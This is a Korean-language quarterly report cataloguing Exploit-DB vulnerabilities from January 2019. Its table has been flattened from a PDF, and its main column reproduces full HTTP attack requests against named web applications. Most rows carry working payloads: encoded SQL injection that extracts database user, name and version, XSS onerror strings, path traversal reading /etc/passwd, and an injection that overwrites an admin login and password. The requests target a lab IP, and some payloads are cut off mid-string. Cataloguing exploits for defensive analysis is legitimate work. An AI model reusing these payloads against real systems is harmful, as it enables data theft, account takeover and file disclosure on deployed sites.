POST /10.0.100.24/assets/lib/front_ajax.php HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 159Cookie: PHPSESSID=hrjvg00694n8qbnctc6buqsrt1;__stripe_mid=2a8f25fc-d13c-4873-96ae-832f3f9d4c11;__stripe_sid=39580a75-f7d8-40ca-aa36-cca625a54f96DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
service_id=%2d%35%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c(selECt(@x)fROm(selEC
t(@x: =0x00)%2c(@rUNNing_nuMBer
Cleanto Cleanto 5.0
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-01-14 46148 SQL Injection 하 상
HealthNode Hospital
Management System 1.0 - SQL
Injection
GET /10.0.100.24/dashboard/Patient/patientdetails.php?id=-11%2d%31%31%27%20%2f%2a%21%31%31%31%31%31%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%31%31%31%31%31%53%45%4c%45%43%54%2a%2f%20%31%2c%32%2c
%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2d%2d%20%2d HTTP/1.1
Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=10ntro6maq17s705ip0e3a9je6DNT: 1
Connection: keep-aliveUpgrade-Insecure-Requests: 1
HealthNodeHospital
Management System
HealthNodeHospital
ManagementSystem 1.0
2019-01-14 46151 SQL Injection 하 하Real Estate Custom Script 2.0 -
SQL Injection
GET/10.0.100.24/index.php?route=property/property_detail&property_id=15912%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=b22e9305c86adea2c071bf2d1053725c;
default=78b0c7c7490c09d10765fb78b61bd9a3; language=en-gb;currency=USD; __zlcmid=qMhwOYHc5w0PnjDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Real Estate CustomScript
Real EstateCustom Script
2.0
2019-01-14 46152 SQL Injection 하 하Job Portal Platform 1.0 - SQL
Injection
POST/10.0.100.24/index.php?route=tmdblog/blog&blog_id=14%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45(22,%25%34%33%25%34%66%25%34%65%25%34%33%25%34%31%25%35%34%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1Host: TARGETUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=b22e9305c86adea2c071bf2d1053725c;default=78b0c7c7490c09d10765fb78b61bd9a3; language=en-gb;currency=USD; __zlcmid=qMhwOYHc5w0PnjDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Job PortalPlatform
Job PortalPlatform 1.0
2019-01-14 46154 SQL Injection 중 하
Bigcart - Ecommerce
Multivendor System 1.0 - SQL
Injection
GET/10.0.100.24/index.php?route=product/category&path=%33%33%5f%36%34%31%34%39%39%39%39%39%27%20%2f%2a%21%31%33%33%33%37%50%72%6f%63%65%44%75%72%65%2a%2f%20%41%6e%41%6c%79%73%65%20%28%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%2c%63%6f%6e%63%61%74%28%30%78%32%37%2c%30%78%33%61%2c%40%40%76%65%72%73%69%6f%6e%29%29%2c%30%29%2d%2d%20%2d HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflateCookie: OCSESSID=19eef2415d8afbee8c2f353629; language=en-gb;currency=USDDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Bigcart -Ecommerce
Multivendor System
Bigcart -Ecommerce
MultivendorSystem 1.0
2019-01-15 46168 SQL Injection 하 하 ownDMS 4.7 - SQL Injection
GET/10.0.100.24/includes/pdfstream.php?IMG=%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35,0x48656c6c6f204861636b657220416269,%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2d%2d%20%2d HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2lj2q69rvodstr9g2c9ki3k3j6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
ownDMS ownDMS 4.7
2019-01-17 46187 XSS 하 하
Oracle Reports Developer
Component 12.2.1.3 - Cross-
site Scripting
GET/10.0.100.24/reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3EE HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0)Gecko/20100101 Firefox/63.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 101Connection: closeUpgrade-Insecure-Requests: 1
Oracle ReportsDeveloperComponent
OracleReportsDeveloperComponent12.2.1.3
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-01-18 46190 LFI 중 하SeoToaster Ecommerce / CRM /
CMS 3.0.0 - Local File Inclusion
POST /10.0.100.24/backend/backend_theme/editcss/ HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 19Cookie: hideAdminPanel=0; currSectionOpen=0;PHPSESSID=0u6ftq75vn79fs3512mli59jo3;mwui=eyJhZG1pbnNpZGViYXJwaW4iOiJ0cnVlIn0%3D;back_to_admin=http%3A//localhost/ExploitDb/latest/admin/view%3AsettingsDNT: 1Connection: keep-alive
Upgrade-Insecure-Requests: 1getcss=../index.php: undefined
SeoToasterEcommerce
SeoToasterEcommerce /CRM / CMS3.0.0
2019-01-18 46191 SQL Injection 하 하phpTransformer 2016.9 - SQL
Injection
GET/10.0.100.24/Programs/news/GeneratePDF.php?Lang=English&idnews=20190000000%27%20%41%4e%44%20%53%4c%45%45%50%28%35%29%2d%2d%20%2dHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: TryLogin=0; PHPSESSID=2hsc4lr80e0lv14jorun0bs390;browserupdateorg=pause; phpwcmsBELang=en;phpwcmsBEItemsPerPage=25;Contemplate=visitor_ID%3DDzk7W2LkwvYjLr4j-20190117235156;phpTransformer=9th36daohkgnuoqm0mmck5her6;phpTransformerSetup=gtaavf8vg8t63s4qhg98q6pi22;
TawkConnectionTime=0;__tawkuuid=e::localhost::L/LRDuMLZaB4u3yegW9pKFQGnt3becl4U6WG0DrN27cIjyTFhHLpZf4VKwUqD3qh::2DNT: 1Connection: keep-alive
Upgrade-Insecure-Requests: 1
phpTransformerphpTransforme
r 2016.9
2019-01-18 46192 Directory Traversal 하 하phpTransformer 2016.9 -
Directory Traversal
GET/10.0.100.24/Programs/gallery/admin/jQueryFileUploadmaster/server/php/index.php?path=../../../../../../ HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=2hsc4lr80e0lv14jorun0bs390;browserupdateorg=pause; phpwcmsBELang=en;phpwcmsBEItemsPerPage=25;Contemplate=visitor_ID%3DDzk7W2LkwvYjLr4j-20190117235156;
phpTransformer=9th36daohkgnuoqm0mmck5her6;phpTransformerSetup=gtaavf8vg8t63s4qhg98q6pi22;TawkConnectionTime=0;__tawkuuid=e::localhost::L/LRDuMLZaB4u3yegW9pKFQGnt3becl4U6WG0DrN27cIjyTFhHLpZf4VKwUqD3qh::2DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
phpTransformerphpTransforme
r 2016.9
2019-01-18 46200 XSS 중 하
Joomla! Core 3.9.1 - Persistent
Cross-Site Scripting in Global
Configuration Textfilter Settings
POST /10.0.100.24/administrator/index.php?option=com_configHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)Gecko/20100101 Firefox/64.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer:http://<target_ip>/administrator/index.php?option=com_config
Content-Type: application/x-www-form-urlencodedContent-Length: 4303Connection: closeCookie: wp-settings-time-1=1540363679;05e3b315128406acf7dd996046a180f8=__SITE__;7bb05cf41807f1d0136fbae285e8a16c=1;783fff54c324d89891f303b51230c499=vnrnl8bo3u62d25ak8tqbruhs2Upgrade-Insecure-Requests: 1
jform%5Bsitename%5D=testjoomla&jform%5Boffline%5D=0&jform%5Bdisplay_offline_message%5D=1&jform%5Boffline_message%5D=This+site+is+down+for+maintenance.%3Cbr+%2F%3EPlease+check+back+again+soon.&jform%5Boffline_image%5D=&jform%5Bfrontediting%5D=1&jform%5Beditor%5D=tinymce&jform%5Bcaptcha%5D=0&jform%5Baccess%5D=1&jform%5Blist_limit%5D=20&jform%5Bfeed_limit%5D=10&jform%5Bfeed_email%5D=n
one&jform%
Joomla! CoreJoomla! Core
3.9.1
2019-01-18 46206 File Upload 하 상
Pydio / AjaXplorer < 5.0.4 -
Unauthenticated Arbitrary File
Upload
get_file&name=../../../../../../../../etc/passwd Pydio / AjaXplorerPydio /
AjaXplorer <
5.0.4
2019-01-21 46209 SQL Injection 하 하 Coman 1.0 - 'id' SQL Injection
GET /10.0.100.24/index.php/framework-crud-detailaction?crud=task&id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dcDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Coman Coman 1.0
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-01-21 46210 SQL Injection 하 하 Reservic 1.0 - 'id' SQL Injection
GET /10.0.100.24/index.php/framework-crud-detailaction?crud=reserves&id=4+%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29+%41%53%20%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&backTo=dashboard HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)
Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dcDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Reservic Reservic 1.0
2019-01-21 46211 SQL Injection 하 하MoneyFlux 1.0 - 'id' SQL
Injection
GET /10.0.100.24/index.php/framework-crud-updateaction?id=1%20%41%4e%44%28%53%45%4c%45%43%54%20%31+%46%52%4f%4d%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53%45%28%29%20AS+%43%48%41%52%29%2c%30%78%37%65%2c%30%78%34%39%36%38%37%33%36%31%36%65%35%33%36%35%36%65%36%33%36%31%36%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%6
8%65%6d%61%3d%44%41%54%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29&crud=expense HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)
Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9832af9c6649b4b918850c9c898e05dcDNT: 1
Connection: keep-aliveUpgrade-Insecure-Requests: 1
MoneyFlux MoneyFlux 1.0
2019-01-21 46212 SQL Injection 하 하PHP Dashboards NEW 5.8 -
'dashID' SQL Injection
GET/10.0.100.24/php/save/savedescriptions.php?dashID=%2d%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35
%2c%36%2c%37%2c%38%2c%39%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%73%63%68%65%6d%61%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%53%43%48%45%4d%41%54%41%29%2c%31%31%2d%2d%20%2dHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
PHP Dashboards NEWPHP
DashboardsNEW 5.8
2019-01-21 46213 LFI 중 하PHP Dashboards NEW 5.8 -
Local File Inclusion
POST /10.0.100.24/php/file/read.php HTTP/1.1Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 37Cookie: PHPSESSID=a5i6r78j7v22ql1qrvtsampff6DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
filename=../../../../../../etc/passwd: undefined
PHP Dashboards NEWPHP
DashboardsNEW 5.8
2019-01-21 46214 SQL Injection 하 하PHP Uber-style GeoTracking 1.1
- SQL Injection
POST /10.0.100.24/php/profile/index.php HTTP/1.1Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 354DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
email=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2d%2d%20%2d: undefined
PHP Uber-styleGeoTracking
PHP Uber-style
GeoTracking1.1
2019-01-21 46217 SQL Injection 하 상Adianti Framework 5.5.0 - SQL
Injection
(SELECT 'hackeado'),login=(SELECT 'anonymous'),password=(SELECT'294de3557d9d00b3d2d8a1e6aab028cf'),email=(SELECT'anonymous@anonymous.com')WHERE `id`=1#
Adianti FrameworkAdiantiFramework5.5.0
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-01-23 46223 SQL Injection 중 하Joomla! Component vBizz 1.0.7
- SQL Injection
POST /10.0.100.24/index.php? HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 726Cookie:84c9f7083d1056c3a8f06ae659d3db0a=9t045qt6rjftqm53itf5uju310;joomla_user_state=logged_inDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
profile_pic=&name=test&username=test&password=&user_role=11&email=test@test.test&empid=1&department=5&designation=6&phone=&gender=1&blood_group=A%2B&dob=-1-11-30&present_address=&permanent_address=&joining_date=-1-11-30&work_type=permanent&payment_type=bank&pan=&pf_ac=0&bank_ac=0&bank_name=&bank_branch=&ifsc=&leaving_date=-1-11-30&amount[]=111.00&payid[]=7.....
Joomla! ComponentJoomla!Component
vBizz 1.0.7
2019-01-23 46225 SQL Injection 하 하Joomla! Component vWishlist
1.0.1 - SQL Injection
POST /10.0.100.24/ HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 372Cookie:1b9dcd66a46474552f38b0164f24ac07=738c74dd230a79b92e8bce29cfd435b
9; activeProfile=0; joomla_user_state=logged_in
DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
option=com_vwishlist&task=wishlist&wishval=1&userid=711&numofQua
ntity=1&wishQuantshw=1&wishPriceshw=1&wishDatetimeshw=1&vproductid=48%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%3
2,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29
%29,%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58: undefined
Joomla! Component
Joomla!Component
vWishlist1.0.1
2019-01-23 46226 SQL Injection 하 하Joomla! Component vAccount
2.0.2 - 'vid' SQL Injection
GET /10.0.100.24/vaccount-dashboard/expense?vid=18%20%20%41%4e%44%20%45%58%54%52%41%43%54%
56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29,%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1Host: 10.0.100.24:1004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie:39b5054fae6740372b1521628707bdc7=pusmhir0h1896vr6v5dvmnqd46DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
Joomla! Component
Joomla!ComponentvAccount2.0.2
2019-01-23 46227 SQL Injection 중 하Joomla! Component vReview
1.9.11 - SQL Injection
POST /10.0.100.24/index.php?option=com_vreview&task=editReviewHTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 210Cookie:1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526; activeProfile=709DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
cmId=%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c
%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d: undefined
Joomla! Component
Joomla!Component
vReview1.9.11
2019-01-23 46228 SQL Injection 하 하
Joomla! Component
vRestaurant 1.9.4 - SQL
Injection
POST /10.0.100.24/menu-listing-layout/menuitems HTTP/1.1
Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 322Cookie:1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3DNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1
csmodid=236&Itemid=303&keysearch=' union select(SELECT(@x)FROM(SELECT(@x: =0x00),(@NR
Joomla! Component
Joomla!Component
vRestaurant1.9.4
날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경
EDB 분석 보고서 (2019.1Q)
2019.01.01~2019.03.31 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.
2019-01-23 46229 SQL Injection 하 하Joomla! Component VMap 1.9.6
- SQL Injection
GET/10.0.100.24/index.php?option=com_vmap&task=loadmarker&latlngbound=-40.716362432588596,40.71920853699145,-73.983044552948,-
73.972959447052%20%4f%72%64%65%72%20%62%79%20%31%32%2d%2d%20%2d&mapid=1 HTTP/1.1Host: 10.0.100.24:1004User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0)
Gecko/20100101 Firefox/55.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie:1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b
3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-
dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526
Joomla! ComponentJoomla!ComponentVMap 1.9.6
2019-01-23 46230 SQL Injection 하 하
Joomla! Component J-
BusinessDirectory 4.9.7 - 'type'
SQL Injection
